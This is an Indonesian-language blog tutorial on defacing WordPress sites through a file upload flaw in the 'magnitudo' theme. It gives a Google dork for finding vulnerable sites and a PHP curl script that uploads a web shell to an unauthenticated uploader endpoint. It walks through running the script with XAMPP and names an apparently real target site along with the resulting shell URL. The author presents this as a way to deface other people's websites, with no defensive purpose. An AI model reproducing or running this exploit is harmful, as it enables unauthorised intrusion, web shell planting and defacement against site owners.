Tutorial Deface Dengan File Upload Vulnerability

Pada tutorial kali ini, saya akan sedikit share mengenai dunia persilatan, saya kemarin coba coba exploit baru, dan lumayan loh menghasilkan, 😀 Hasilnya saya bisa deface web orang, walaupun cuma nitip fila aja. Mau tau kaya gimana caranya? Berikut ini :

Google Dork : inurl:wp-content/themes/magnitudo 

pake otak kalian buat ngembangin dork

Exploit :

$uploadfile="shell.php";
$ch = curl_init("http://site.com/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Pertama download XAMMP nya disini :http://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.7/xampp-win32-1.7.0-installer.exe/download

Jika Sudah , Cari File php.ini di System[C] -> Xammp -> Php -> Php.ini

Lalu tekan Control F dan ketikkan “curl” tanpa tanda kutip , lalu jika ketemu kamu hapus tandan ( ; ) , Lalu save ..

Oke , sekarang kamu Copy Exploitnya dan save dengan extensi .php

Simpan di folder xammp -> xammp -> PHP

Kedua , kamu copy shell kamu ke Folder xammp -> xammp -> PHP

Misalkan nama shell anda x.php ganti shell php yang ada di exploit tadi

$uploadfile=”shell.php”; kamu rename dengan nama shell kamu tadi jika namanya x.php kamu rename menjadi x.php juga :))

Oke sekarang langsung saja , Pertama kita cari target dengan GOOGLE DORK tadi

Ex : http:/www.rikotamfan.com/

Lalu tambahkan dengan exploitnya

/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php

Jika Ada Error Files Upload  berarti itu vuln .

Buka exploitnya kamu copy semuanya ke exploit tadi 

Lalu buka CMD , 

Ketikkan cd xammp enter >> cd php enter

Jika succes , filenya akan berada disini


http://rikotamfan.com/wordpress/wp-content/uploads/2013/10/x.php

aji kusuma has written 26 articles

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>